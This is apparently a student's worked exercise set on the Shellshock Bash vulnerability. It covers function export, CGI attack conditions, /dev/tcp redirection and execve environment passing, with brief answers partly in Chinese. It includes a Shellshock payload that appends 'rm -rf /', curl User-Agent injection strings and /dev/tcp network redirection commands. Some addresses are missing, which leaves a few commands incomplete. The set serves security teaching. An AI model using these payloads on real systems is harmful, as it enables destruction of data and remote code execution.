
3.1. When a shell variable containing a shell function definition is passed down to a child process as an environment variable, what is going to happen to the function definition?


3.2. Assume a Bash program defines a shell function, exports it, and then starts a child process that also runs Bash. Please explain how this function defined in the parent Bash becomes a function in the child Bash.


3.3. Write a Bash function definition that tries to exploit the Shellshock vulnerability.

seed@ubuntu:~$ export foo='() { echo Hello World; }; rm -rf /'

seed@ubuntu:~$ bash

3.4. Instead of putting an extra shell command after a function definition, we put it at the beginning (see the following example). We then run Bash, which is vulnerable to the Shellshock attack. Will the shell command echo world be executed?

$ export foo=’echo world; () { echo hello;}’
$ bash


3.5. For the Shellshock vulnerability to be exploitable, two conditions need to be satisfied. What are these two conditions?


3.6. How do user inputs get into a remote a CGI program (written in Bash) in the form of environment variables?


3.7. Instead of using a function definition in the Shellshock attack against CGI programs, can we directly put shell commands inside the User-Agent field, so when Bash is triggered, the shell command can be executed?


3.8. Why was this mistake made? And what lesson did you learn from this mistake?

p47 错误的解析代码parse_and_execute() 造成了安全漏洞

3.9. There is another way to send inputs to a CGI program. That is to attach the input in the URL. See the following example.

Can we put our malicious function definition in the value field of the above URL, so when this value gets into the CGI program myprog.cgi, the Shellshock vulnerability can be exploited?


3.10. We run "nc -l 7070" on Machine 1 (IP address is, and we then type the following command on Machine 2. Describe what is going to happen?

$ /bin/cat < /dev/tcp/ >&0

nc-L7070将监听端口7070上的传入连接 所以机器1 会 在屏幕上显示机器2输入的任何内容

3.11. Please describe how you would do the following: run the /bin/cat program on Machine 1; the program takes its input from Machine 2, and print out its output to Machine 3.

$ nc -l 7070

$ nc -l 7070

Machine 1:
$ /bin/cat < /dev/tcp/Machine2/7070 > /dev/tcp/Machine3/7070

3.12. Consider the following program:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
extern char **environ;
int main()
    char *args[] =
        "/bin/sh", "-c",
        "/bin/ls", NULL
    pid_t pid = fork();
    if(pid == 0) {
        /* child */
        execve(args[0], &args[0], NULL); À
    else if(pid > 0) {
        /* parent */
    return 0;

The program forks a child process, and executes the /bin/ls program using /bin/sh, which is a symbolic link to /bin/bash. The program is executed as the following. Explain what the output of the program will be and why.

$ gcc prog.c -o prog
$ export foo=’() { echo hello; }; echo world;’
$ ./prog

execve没有传入父进程的环境变量 所以没有打印 world

3.13. Let’s make a change to the code in Problem 3.12.. We change the code in Line À to the
following. Please redo Problem 3.12. with this change made.

execve(args[0], &args[0], environ);


3.14. Consider a PHP program running as Apache module, and a CGI program.

The PHP program (test.php):
system("/bin/ls -l")
The CGI program (test.cgi):
/bin/ls -l

Both programs invoke /bin/ls command in a new shell process (/bin/sh points to /bin/bash). If the programs are invoked as the following, please explain the difference in effect of the Shellshock vulnerability on these two cases. What conditions are necessary to exploit shellshock in either case?

$ curl -A "() { echo hello; }; echo world;"
$ curl -A "() { echo hello; }; echo world;"

p57 shell shock漏洞要求满足两个条件

  1. bash调用
  2. 传入用户数据作为环境变量

但再php脚本中并不总是能被满足 如果不用cgi 则apache无法通过环境变量传给php程序

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